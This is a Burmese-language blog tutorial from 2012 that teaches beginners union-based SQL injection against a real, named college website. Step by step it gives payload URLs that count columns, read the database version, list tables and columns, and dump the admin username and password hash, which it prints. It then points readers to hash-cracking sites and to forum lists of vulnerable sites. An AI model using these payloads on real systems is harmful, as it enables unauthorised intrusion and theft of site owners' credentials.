Tuesday, December 25, 2012

SQL injection For Beginner(MHU)

slq injection ဆိုတာ website ေတြကို ဟက္ဖို ့ နည္းတစ္ခုပါ…. ဖြင့္ဆိုခ်က္က ဘာလည္း ဘာညာေတာ့ မသိလည္း ျဖစ္ပါတယ္…. ေအးေဆးေပါ့ လက္ေတြ ့ကိုပဲ တူတူ ရြီးၾကတာေပါ့…. ဆိုက္ေတြက အေၾကာင္း အမ်ိဳးမ်ိဳးေၾကာင့္ ဟာကြက္ေလးေတြ ခ်ိဳ ့ယြင္းခ်က္ေလးေတြ ျဖစ္လာပါတယ္…. အဲဒီ ဟာကြက္ေတြကို အခြင့္ေကာင္းယူျပီး အဲဆိုက္ ပိုင္ရွင္ရဲ့ နာမည္နဲ ့ password ကို ရေအာင္ယူျပီး လုပ္ခ်င္ရာလုပ္ၾကမယ္ဆိုပါေတာ့ …. ပထမဆံုး slq injection နဲ ့ လုပ္လို ့ ရမယ့္ ဟာကြက္ ရွိတဲ့ ဆိုက္ကို ရွာပါမယ္…. ရွာနည္းကေတာ့ ဘာမွ ခက္တာကို မပါတာပါ…. ေအာက္ဆံုးမွာ ညြန္းထားပါတယ္ အဆင္ေျပမွာပါ…. ဒါကေတာ့ လုပ္ရံု သက္သက္ပါပဲ…. ေတြ ့ျပီပဲဆိုပါေတာ့

Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1
အဲဒီမွာ ဟာကြက္ရွိပါတယ္…. ေသခ်ာေအာင္ ထပ္စမ္းပါမယ္ 1 အေနာက္မွာ ( ) ေလးကပ္ထည့္ၾကည့္ပါ…. ဟာကြက္ ရွိတယ္ ဆိုရင္ error ျဖစ္ေနပါလိမ့္မယ္…. အခု ပစ္မွတ္ကို ထည့္လို္္က္တာ ေအာက္ကလို အယ္ရာ ျဖစ္ေနပါတယ္….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1'
Click this bar to view the original image of 1012x569px.


ဒါဆို ဟာကြက္ ရွိျပီေပါ့….ေကာင္မေလးက ျပန္ခ်စ္သလို ေပ်ာ္ေပအုန္းေတာ့ ေဟ…့ ခစ္ခစ္ တစ္၀က္ပဲ ေပ်ာ္…. ဟို လစ္တယ္ ဆိုတဲ ့ကေလးေလးလို မိဘသေဘာမတူရင္ ထိုင္ငိုေနရမယ္…. ေနာက္တစ္ခု ဆက္လုပ္ပါမယ္…. အဲ၀က္ဆိုက္မွာ ေကာ္လံ ဘယ္နွစ္ခု ရွိလည္း စစ္ရပါမယ္…. 1 အေနာက္မွာ စေပ့ေလး ျခားျပီး order by 1-- လို ့ရိုက္ဖြင့္ၾကည့္ပါ သူ ့ပံုမွန္ပြင့္ေနက် အတိုင္း ၀က္ဆုိက္ၾကီးက ပြင့္လာပါမယ္ ဒါဆုိ ေကာ္လံ တစ္ခု မဟုတ္ပါဘူး order by 2-- လို ့ လုပ္ၾကည့္ပါ ပံုမွန္အတုိင္းပြင့္ရင္ ေကာ္လံ နွစ္ခု မဟုတ္ပါဘူး အဲလို တစ္ခု တစ္ခု တိုးတိုးျပီး လုပ္ၾကည့္သြားပါ အယ္ရာ တက္လာတဲ့ ဂဏန္းက်ရင္ ရပ္ထားလုိက္ပါ ျပီးရင္ အဲဂဏန္းကို တစ္ေလ်ာ့လိုက္ပါ ရလာတဲ့ အေရအတြက္က ေကာ္လံအေရအတြက္ပါပဲ ဥပမာျပပါ့မယ္ အခု ကြ်န္ေတာ္တို ့ 1 ကေန တိုးျပီး လုပ္လာတာ 6 မွာ အယ္ရာ တက္ပါတယ္ ဒါဆို ေကာ္လံ 5 ခု ရွိပါတယ္ အယ္ရာတက္တဲ့ ဂဏန္းကို တစ္ခုေလ်ာ့တာဟာ ရွိတဲ ့ေကာ္လံ အေရအတြက္ပါပဲ…. ပံုကို ၾကည့္ပါ 6 အေရာက္မွာ အယ္ရာ တက္ေနပါတယ္
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1 order by 6--


ေကာ္လံ 5 ခုရွိပါတယ္…. ေကာ္လံ ဘယ္နွစ္ခု ရွိလည္း စစ္တာကို ရွင္းျပီ ထင္ပါတယ္…. ေနာက္တစ္ဆင့္က ဘယ္ေကာ္လံကေန အခ်က္အလက္ေတြ ယူလုိ ့ ရလည္းလို ့ စမ္းပါမယ္ union all select နဲ ့ ေကာ္လံ အေရအတြက္ကို တြဲေပးလုိက္ရင္ ရပါျပီ ဒီလုိျဖစ္သြားတာေပါ့ ဖြင့္ၾကည့္လုိက္ပါ ေအာက္က ပံုလို ျဖစ္သြားပါမယ္….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,2,3,4,5--


ပံုမွာ 2 နဲ ့3 ေပၚေနပါတယ္ ဒါဆို ၀င္လို ့ ရတဲ့ ေကာ္လံက ေကာ္လံ 2 နဲ ့ ေကာ္လံ 3 ေပါ့ သူတုိ ့ကို သံုးျပီး ၀င္ပါမယ္ ၀င္တဲ့ေနရာမွာ ၾကိဳက္တဲ့ ေကာ္လံက ၀င္နိုင္ပါတယ္…. 2က ၀င္၀င္ 3 က ၀င္၀င္ပါ…. အေပၚကပံုကို ေသခ်ာ ၾကည့္ပါ ၀က္ဆုိက္လိပ္စာမွာ 1အေရွ့မွာ - ေလးထည့္ျပီး -1လို ့ေရးထားပါတယ္…. အဲလို ထည့္မွ ေကာ္လံေပၚမွာပါ…. ေနာက္တစ္ဆင့္က အခ်က္အလက္ေတြ သိမ္းထားတဲ့(database)က version ဘယ္ေလာက္လည္းလုိ ့ စစ္ရပါမယ္…. စစ္နည္းကေတာ့ ၀င္လို ့ ရတဲ့ ေကာ္လံ ေနရာမွာ @@version ကို အစားထိုး ရံုပါပဲ…. ဒီလိုျဖစ္သြားပါမယ္….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,@@version,3,4,5--
ဒါဆို သံုးေနတဲ့ ဗားရွင္းေပၚလာပါမယ္ ပံုမွာၾကည့္ပါ



5.0.77 ဆိုတာေလး ျမင္မွာပါ ဒါဆို ဗားရွင္း သိပါျပီ ဗားရွင္းကို နွစ္မ်ိဳးပဲ ခြဲပါမယ္…. ဗားရွင္း 4 နဲ ့5 ဆိုျပီးေတာ့ပါ …. ဘာလို ့ ဗားရွင္းကို သိေအာင္ လုပ္လည္းဆိုေတာ့ ဗားရွင္း 4 အတြက္က လုပ္နည္း တစ္ခု 5 အတြက္က လုပ္နည္း တစ္ခုမို ့ပါ…. ဗားရွင္း 4, 5 ခြဲတာကို ကြဲျပားေအာင္ ေျပာပါ့မယ္ 5 နဲ ့ ငါးထက္ၾကီးရင္ ဗားရွင္း 5 သံုးတာပါ…. အခုက 5 ထက္ၾကီးလို ့ 5 သံုးတယ္လို ့ သိပါျပီ…. ၀က္ဆိုက္ေတြက အခ်က္အလက္ေတြကို table ေတြထဲသိမ္းထားပါတယ္ ဒီေတာ့ ဒီ၀က္ဆိုက္မွာ ေတဘယ္ ဘယ္နွစ္ခု ရွိတယ္ ဆုိတာ စစ္ပါ့မယ္…. ဗားရွင္း စစ္သလိုပါပဲ ဟာကြက္ ရွိတဲ့ ေကာ္လံမွာ group_concat(table_name) ကိုထည့္ ေနာက္ဆံုးမွာ from information_schema.tables where table_schema=database()-- ကိုထည့္လုိက္ရင္ ရပါျပီ ဒီလိုေလးျဖစ္သြားတာေပါ့
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,group_concat(table_name),3,4 ,5 from information_schema.tables where table_schema=database()--
ဖြင့္ၾကည့္လိုက္ပါ ေအာက္က ပံုေလး ေပၚလာပါမယ္….

Click this bar to view the original image of 1012x569px.


Article, arcitle_category_mapping စသျဖင့္ အမ်ားၾကီး ေပၚလာပါျပီ အဲဒီ ေတဘယ္ေတြ ထဲကမွ ၀က္ဆိုက္ကို ၀င္ခြင့္ရမယ့္ admin name နဲ ့ password ရွိတဲ့ ေတဘယ္ကို ရွာျပီး admin password ယူရပါမယ္…. တစ္ခါတစ္ေလ ကိုယ္က password ရွိမယ္ထင္ျပီး ရွာတဲ့ ေတဘယ္က မရွိတတ္ပါဘူး…. ဒါဆို ေနာက္ ေတဘယ္ တစ္ခုကို ၾကိဳးစား ရပါမယ္…. ကြ်န္ေတာ္တို ့ ေတဘယ္ေတြ လုိက္ၾကည့္ရင္း tbl_adminsignup ဆိုတာ ေတြ ့ပါျပီ adminsignup ဆိုတာၾကီးက နည္းနည္း ရင္ခုန္ဖို ့ ေကာင္းပါတယ္…. ဒီေတာ့ အဲေတဘယ္ထဲမွာ ဘာေတြ ရွိလည္း ၾကည့္ပါေတာ့မယ္ မၾကည့္ခင္ ေတဘယ္ေတြ ဘယ္လို တည္ေဆာက္ထားလည္း အရင္ ေဆြးေႏြး ၾကည့္ရေအာင္…. ေတဘယ္ တစ္ခုကို row ေတြ columnေတြနဲ ့ တည္ေဆာက္ပါတယ္…. ဒီလိုေပါ့

နာမည္ ပက္စေ၀ါ့ ေမြးေန ့
၀တ္မွုန္ေရြရည္ booterlove 13.2.1985
နန္းခင္ေဇယ်ာ lovingbooter 24.5.1995
မိုးယုစံ booterwife 21.21.1991

အဲဒီမွာ row(အလ်ားလိုက္) ေလးခု နဲ ့ column(ေဒါင္လိုက္) သံုးခုပါပါတယ္…. ဒါက ေတဘယ္ တစ္ခုပါပဲ…. အခု ကြ်န္ေတာ္တို ့ ၾကည့္ခ်င္တဲ့ ေတဘယ္မွာ ဘာေတြပါလည္းလို ့ column ေတြေခၚၾကည့္ပါမယ္…. ၾကည့္နည္းက ဒီလိုေလးပါ
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,column_name,2,3,4,5 from information_schema.columns where table_name=’tbl_adminsignup’--
ဖြင့္ၾကည့္ပါမယ္….

Click this bar to view the original image of 1012x569px.


ေတြ ့ပါျပီ column ေတြ strname, strusername, strpassword, strdob, intid တို ့ပါ အဲ column ေတြ ထဲမွာ ရင္ကို အထိရွ ေစဆံုးက strusername, strpassword ပါပဲ ဒီ columnေတြထဲမွာ admin password ရွိမယ္လို ့ ထင္ပါတယ္…. စမ္းၾကည့္ရေအာင္ သံုးရမွာက ဒီလိုေလးပါ….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,concat(strusername,0x3a,strpassword),3,4,5 from tbl_adminsignup--
ဖြင့္ၾကည့္ပါမယ္….

Click this bar to view the original image of 1012x569px.


strusername ဆိုတဲ့ column ရယ္ strpassword ဆိုတဲ့ column ရယ္ ဒီနွစ္ခု ေအာက္မွာ ရွိတာေတြကို ျပပါျပီ.... အဟမ္း အဟမ္း ဒီလို ဆိုရင္ျဖင့္ လိုခ်င္တဲ့ ၀က္ဆိုက္ရဲ့ admin password ေပၚလာပါျပီ(ဆိုက္တိုင္းလိုလုိမွာ admin နာမည္က admin ပါပဲ ) …. အခု လိုခ်င္တာ ရပါျပီ….
Admin:*01A6717BS8FFSC7EAFF6CB7C96F7428EA6SFE4C
ဆိုျပီးေတာ့ပါ username ကadmin.. password က *01A6717BS8FFSC7EAFF6CB7C96F7428EA6SFE4C ပါ ကြ်န္ေတာ္ ခုနသံုးလိုက္တဲ့ ဟာေလးကို ျပန္ရွင္းၾကည့္ပါမယ္….
union all select 1,concat(strusername,0x3a,strpassword),3,4,5 from tbl_adminsignup
၀င္လုိ ့ရတဲ့ ေကာ္လံမွာ strusername,0x3a,strpassword နဲ ့ ေနာက္ဆံုးမွာ from tbl_adminsignup
လို ့ ထည့္ထားပါတယ္ ဆိုလိုတာက tbl_adminsignup ဆိုတဲ့ ေတဘယ္ထဲမွာ ရွိတဲ့ strusername, strpassword ဆိုတဲ့ေကာ္လံေအာက္မွာ ရွိတာကို ျပခိုင္းတာပါ(tbl_adminsignup ေနရာမွာ တစ္ျခား table name ေတြ အစားထိုး ၾကည့္လို ့ ရပါတယ္ အဲလိုပဲ strusername strpassword တို ့ေနရာမွာလည္း တစ္ျခား column name ေတြ အစားထိုးလို ့ရပါတယ္....) အလယ္က 0x3a ဆိုတာ : ေလးကို ၀က္ဆုိက္က နားလည္ေအာင္ ေရးထားတာပါ…. ပံုကိုၾကည့္ပါ ပထမ username လာတယ္ ဒုတိယ : လာတယ္ တတိယ password လာတယ္ ကြ်န္ေတာ္တို ့ ေရးလိုက္တဲ့ အစဥ္တိုင္း သူလာတာပါ 0x3a ကို မထည့္ရင္ username နဲ ့ password ကို ပူးျပီး ျပလာမွာပါ ဒါဆို ရွုပ္ေနမွာေပါ့ ရွင္းသြားေအာင္ အလယ္မွာ အစက္ေလး နွစ္စက္နဲ ့ ျခားလိုက္တာပါ ဒီေလာက္ဆို ရွင္းေလာက္ပါျပီ ေျပာစရာရွိေသးတာက password ပါ သူက ပက္စေ၀ါ့ အစစ္ မဟုတ္ေသးပါဘူးစကားလိမ္(hash) နဲ ့ေရးထားတဲ့ ပက္စေ၀ါ့ပါ စကားလိမ္ကို ေျဖျပီးမွ အစစ္ရမွာပါ ဒါဆို ေျဖရအုန္းမွာေပါ့ အင္တာနက္ထဲမွာ ေျဖေပးတဲ့ ၀က္ဆိုက္ေတြ အမ်ားၾကီး ရွိပါတယ္ ေျဖေပးတဲ့ ေဆာ့၀ဲလ္ေတြလည္း ရွိပါတယ္ သံုးရံုပါပဲ ပက္စေ၀ါ့ေတြကို စကားလိမ္ လုပ္နည္းေတြ အမ်ားၾကီး ရွိပါတယ္ md5 ဆိုတဲ့လုပ္နည္း mysql5 ဆိုတဲ့ လုပ္နည္း စသျဖင့္ လုပ္နည္း ေပါင္း မ်ားစြာ ရွိပါတယ္ အဲလုပ္နည္းေတြကို အစ္ကို big boss ေရးထားတဲ ့ ပို ့စ္မွာ သြားၾကည့္ပါ အဲမွာ စာလံုး အေရအတြက္ ဘယ္နွစ္လံုးပါရင္ ဘာသေကၤတပါရင္ ဘာနည္းနဲ ့ စကားလိမ္ လုပ္ထားတယ္ ဆိုတာကို ဇယားေလး လုပ္ေပးထားပါတယ္ ခုရလာတဲ့ ပက္စေ၀ါ့ကို တုိက္ၾကည့္လုိက္ေတာ့ mysql5 နဲ ့ လုပ္ထားတယ္ ဆိုတာ သိသြားပါျပီ ဒါဆို Mysql5 ေျဖေပးတဲ့ ၀က္ဆိုက္ ဒါမွမဟုတ္ ေဆာ့၀ဲလ္နဲ ့ေျဖယူ လုိက္ရံုပါပဲ ဒါဆို ၀က္ဆိုက္ထဲကို ပိုင္ရွင္ အျဖစ္နဲ ့ ၀င္လုိ ့ ရပါျပီ အထဲမွာ ပတ္ေမြနုိင္ျပီေပါ့ဗ်ာ….
ဒီစာအုပ္ေလး ဖတ္ၾကည့္ပါ စာေတြ အျပင္ tutorial video လင့္ခ္ေတြလည္း ပါတာမို ့ စံုပါတယ္…. အဲမွာပဲ အယ္ရာ ျဖစ္တဲ့ ၀က္ဆိုက္ေတြ ရွာနည္းပါပါတယ္…. က်န္တဲ ့သိသင့္တာေလးေတြလည္း စံုစံုလင္လင္ ပါပါတယ္…. အခု လုပ္ျပသြားတာက အေျခခံေလာက္ ေပါ့ က်န္တာေတြ ဆက္ၾကည့္ဖုိ ့ လိုအပ္တာေလာက္ေပါ့…. ဒါေၾကာင့္ ဒီစာအုပ္ကို ဖတ္ျပီး က်န္တာေတြ ဆက္ၾကည့္တာေပါ့….

Code:
http://minus.com/lGpnplaCVItj2
Hash types(စကားလိမ္ နမူနာေတြ)
Code:
http://mmhackforums.com/forum/showthread.php?142-Hash-types
online hash crackers(စကားလိမ္ ေျဖတဲ့ ဆုိက္ေတြ)
Code:
http://mmhackforums.com/forum/showthread.php?170-Online-Hash-Crackers
sql injection vuln sites(ေလ့က်င့္ဖို ့ အယ္ရာျဖစ္ေနတဲ့ ဆိုက္ေတြ)
Code:
http://mmhackforums.com/forum/showthread.php?335-SQLi-vulnerable-site-list
လူခ်င္းတူေပမယ့္ ပါရမီခ်င္း မတူပါဘူး ဆက္ခ်ဲ ့ထြင္ျပီး လမ္းသစ္ေဖာက္နုိင္ၾကပါေစ…. အေရွ့က လူေတြကေတာ့ သြားလာလို ့ ေကာင္းေအာင္ လမ္းေဖာက္ခဲ့ပါတယ္…. ကိုယ့္လက္ထက္မွာ ပိုက်ယ္ေအာင္ ခ်ဲ့နိုင္ရင္ေကာင္းတာေပါ့ ဟုတ္ဘူးလား…. အားမေလ်ာ့ပဲ တစ္ဆိုက္ မရ တစ္ဆိုက္ ေျပာင္းျပီး ေလ့က်င့္ၾကတာေပါ့…. မရတိုင္းလည္း ေျပာင္းနဲ ့ေပါ့ဗ်ာ…. နည္းနည္းေတာ့ စဥ္းစားၾကည့္အုန္း ဟီးဟီး…. ဒီေလာက္ဆို အေျခခံေလး ရျပီထင္တာပဲ..........>>>>>><<<<<<<<

0 comments:

Post a Comment